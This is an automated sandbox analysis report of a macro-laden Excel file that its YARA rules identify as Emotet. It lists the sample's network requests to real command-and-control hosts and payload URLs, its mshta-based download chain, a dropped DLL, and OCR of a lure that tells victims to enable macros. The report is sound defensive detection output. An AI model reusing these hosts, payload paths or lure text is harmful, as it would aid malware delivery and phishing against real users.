                            Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htmJump to behavior
                            Source: unknownDNS traffic detected: queries for: weezual.fr
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10012C30 _memset,connect,_strcat,send,recv,9_2_10012C30
                            Source: global trafficHTTP traffic detected: GET /cc/vv/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /cc/vv/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /ju9c/twEHJDCvNwGimD/ HTTP/1.1Host: weezual.frConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /Fox-CCFS/zBdGqiyW1HTZD2j/ HTTP/1.1Host: mycloud.suplitecmo.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Fri, 28 Jan 2022 19:39:50 GMTcontent-type: text/html; charset=iso-8859-1content-length: 261server: Apachex-iplb-request-id: 66818F3D:C011_D5BA2104:0050_61F44686_C83C:4CC4x-iplb-instance: 31947Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 53 65 72 76 65 72 20 75 6e 61 62 6c 65 20 74 6f 20 72 65 61 64 20 68 74 61 63 63 65 73 73 20 66 69 6c 65 2c 20 64 65 6e 79 69 6e 67 20 61 63 63 65 73 73 20 74 6f 20 62 65 20 73 61 66 65 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.Server unable to read htaccess file, denying access to be safe</p></body></html>
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: unknownTCP traffic detected without corresponding DNS query: 160.16.102.168
                            Source: mshta.exe, 00000004.00000003.420762687.000000000039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436088284.000000000039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437284316.000000000039C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000004.00000003.420762687.000000000039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.436088284.000000000039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437284316.000000000039C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: rundll32.exe, 00000010.00000002.677036027.00000000005A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,9_2_1001B43F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,11_2_1001B43F
                            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                            E-Banking Fraud

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 16.2.rundll32.exe.2d30000.19.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2c30000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2d60000.20.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.210000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.9b0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.4c0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2ef0000.27.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2e50000.25.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2ba0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2890000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2c60000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.950000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.950000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.24a0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2d00000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.320000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2970000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e40000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3050000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2970000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3d0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2cd0000.17.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.9b0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.2a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2470000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2e80000.26.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.24a0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.f30000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.810000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.3030000.29.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2890000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2c60000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2dc0000.22.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e10000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2cd0000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.8d0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.3000000.28.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e70000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.3060000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.4c0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.af0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.8b0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.210000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2e20000.24.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.710000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2fb0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2780000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2ba0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.950000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.8e0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2fe0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e70000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3d0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e10000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2c00000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2fe0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2bd0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.f30000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2520000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.880000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2dc0000.22.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2d90000.21.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e10000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2e0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2d60000.20.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.3000000.28.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.770000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.8d0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.980000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.8b0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.810000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2df0000.23.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.af0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2860000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.840000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2fe0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2fe0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.29e0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2df0000.23.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.900000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.300000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.710000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2e80000.26.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2e0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.2c00000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000C.00000002.551947539.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.676591356.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678280705.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677632301.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.500040027.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677997537.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677450513.0000000002970000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551880508.0000000002FB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677756106.0000000002C00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.554134949.0000000000301000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.450824461.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.502588343.0000000000710000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551919962.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677929606.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551623719.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499259204.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678314605.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.550973971.0000000000211000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551989518.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499994350.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551538985.0000000000901000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677111483.0000000000951000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677326122.00000000024A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.502811029.0000000000771000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.676639526.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678212374.0000000002D91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.676821623.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677356744.0000000002521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499873731.0000000002781000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.554075703.00000000002D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499710740.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677199098.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.676670524.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.676732773.0000000000321000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678106332.0000000002D31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499733166.00000000008E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678697687.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551472504.0000000000841000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677832444.0000000002C31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678494850.0000000003000000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551824983.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677505319.00000000029E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551706896.0000000002861000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551513141.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677680233.0000000002BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678137863.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.554395165.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499690055.0000000000881000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551450592.0000000000810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678441464.0000000002EF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499762577.0000000000950000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551800161.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.550895567.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499359397.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.677297499.0000000002471000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499783564.0000000000981000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678529505.0000000003031000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678356507.0000000002E21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.503146920.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.500113987.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.551739042.0000000002890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.500072770.0000000003051000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678048662.0000000002D01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499969504.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.499804100.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678386689.0000000002E51000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.678412347.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\JooSee.dll, type: DROPPED

                            System Summary

                            barindex
                            Found malicious Excel 4.0 Macro
                            Source: NZW-010122 BNUV-280122.xlsmMacro extractor: Sheet: LINKO contains: mshta
                            Source: NZW-010122 BNUV-280122.xlsmMacro extractor: Sheet: LINKO contains: mshta
                            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                            Source: Screenshot number: 4Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22
                            Source: Screenshot number: 4Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 Previewing is not available for protected documents. 14 15
                            Source: Screenshot number: 4Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 17 18 19 20 21 22 23 24 25 26 27 2
                            Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 16 :: 19 20 21 22 U LI
                            Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. 10 11 12 13 , , Previewing is not available for protected documents. 14
                            Source: Screenshot number: 8Screenshot OCR: protected documents. 14 15 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 16 :: 19 20 21 22 U LI 23 24 25 26 27
                            Document contains OLE streams with names of living off the land binaries
                            Source: NZW-010122 BNUV-280122.xlsmStream path 'Workbook' : ........ZO..........................\.p....xXx B.....a.........=.............................................=........p.08.......X.@...........".......................1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1.......4........h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i.1...,...6........h..C.a.l.i.b.r.i.1.......6........h..C.a.l.i.b.r.i.1.......6........h..C.a.l.i.b.r.i.1.......>........h..C.a.l.i.b.r.i.1.......4........h..C.a.l.i.b.r.i.1.......<........h..C.a.l.i.b.r.i.1.......?........h..C.a.l.i.b.r.i.1.*.h...6........h..C.a.l.i.b.r.i. .L.i.g.h.t.1................h..C.a.l.i.b.r.i.1................h..C.a.l.i.b.r.i...3......#.,.#.#.0.\. .".. ".;.\.-.#.,.#.#.0.\. .".. "...=......#.,.#.#.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0.\. .".. "...?......#.,.#.#.0...0.0.\. .".. ".;.\.-.#.,.#.#.0...0.0.\. .".. "...I..."..#.,.#.#.0...0.0.\. .".. ".;.[.R.e.d.].\.-.#.,.#.#.0...0.0.\. .".. "...q.*.6.._.-.*. .#.,.#.#.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0.\. .".. "._.-.;._.-.*. .".-.".\. .".. "._.-.;._.-.@._.-...,.).'.._-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_-....,.>.._.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;.\.-.*. .#.,.#.#.0...0.0.\. .".. "._.-.;._.-.*. .".-.".?.?.\. .".. "._.-.;._.-.@._.-...4.+./.._-* #,##0.00_-;\-* #,##0.00_-;_-* "-"??_-;_-@_-.......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ............ .......... ...ff....... ......+... ............ ......)... ............ ......,... ............ ......*... ............ .......... ............ .......... ............ .......... ....P....... .......... ....P....... .......... .... ....... .......... ............ .......... ............ .......... ....`....... .......... ............ .......... ............ .......... .....
